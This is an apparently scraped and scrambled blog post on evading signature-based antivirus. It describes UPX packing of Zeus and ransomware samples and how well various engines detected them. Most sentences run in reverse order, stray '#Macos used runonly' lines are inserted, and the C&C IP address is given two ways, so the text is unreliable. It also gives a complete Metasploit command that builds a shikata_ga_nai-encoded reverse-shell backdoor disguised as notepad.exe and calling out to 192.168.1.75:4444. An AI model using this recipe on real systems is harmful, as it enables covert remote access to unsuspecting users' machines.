It was the expected result to demonstrate the limitations of signature-based antivirus engines. None of them-including Microsoft, Symantec, McAfee-identified the backdoor that was encoded in this file. This test was a complete miss for every one of 46 antivirus engines available at. It was then time to upload and scan notepad2.exe to test the detection capabilities of the same antivirus engines used in the previous tests. The victim would execute notepad2.exe and create a backdoor connection to the C&C server at 192.167.1.75. The final product – notepad2.exe – was produced by using notepad.exe as a template. This phrase means “it cannot be helped” in Japanese, but also refers to the polymorphic XOR additive feedback encoder used by Metasploit to create the executable. This was piped to the encoder, which ran through five passes using the shikata ga nai encoder. The command generated a standard reverse TCP backdoor, which would connect to the command and control server at 192.168.1.75 on port 4444. Msfpayload windows/shell/reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe
#Macos used runonly to avoid detection windows#
I ran several standard Microsoft Windows executables through the following command to test the antivirus detection rate: This is how a penetration tester can evade antivirus engines, and simulates how malware authors generate realistic-looking malicious code. An unsuspecting user is likely to run “notepad.exe” and not realize it has been modified.
It can also generate executables, which can be templated from default Microsoft Windows program files. Many popular file formats can be created by this tool, including PDFs and all of the standard Microsoft Office formats. The ability to package exploits or backdoors into files that could be used in penetration tests was a key feature that was added several years ago. This tool is well known for its open contribution development and flexibility. My next test utilized the popular Metasploit Community Edition penetration-testing framework. Packaging Exploits With Penetration-Testing Frameworks There are still plenty of other methods that can be utilized to bypass all of them. This test simply demonstrates that it is possible to bypass antivirus engines using this methodology.
The results could be completely different using different malware samples or compression tools. The test only consisted of two different files that had been packed using one compression tool. However, this is not to imply that any of these antivirus engines offer “better” protection than any others. McAfee and Microsoft both do well in this test. Symantec turned out to be one of the engines that failed to detect any malware from the packed ransomware executable, but it was certainly not alone as the tables below illustrate. Three more antivirus engines missed detection altogether, raising the total number of misses this time to 15. The test results from packing the fake antivirus ransomware were even better than results achieved with the packed Zeus Trojan. The next test was to verify if McAfee would do as well with another malware sample. McAfee was able to detect the malware despite the modifications, which looked promising. The following lists show that, except for McAfee, most of the well-known antivirus engines also reclassified the malware.
Symantec was not alone in reclassifying the type of malware detected. The second is a variant of the incredibly successful ransomware, which resembles fake antivirus and has been the scourge of IT helpdesks around the world. One is a variant of the Zeus Trojan that came through antivirus systems undetected in May of 2012. I chose two of the most infamous strains of malware in my collection. I find it helpful to keep a collection of malware samples that I have encountered over the years to test new defenses and validate detection strategies. I used this technique against known malware samples to demonstrate the effectiveness of obfuscation through compression. It is open source and available from Sourceforge. Many applications can be used for compression, but one of the most popular is called Ultimate Packer for executables (UPX).
#Macos used runonly to avoid detection code#
By using compression techniques, malware authors found they could modify their code in order to bypass signature-based antivirus software. Originally intended to aid application developers in reducing the size of their program files to ease distribution, compression is used by malware authors to obfuscate the contents of the executable. One of the first techniques that attackers use to avoid antivirus detection is compression.
0 kommentar(er)
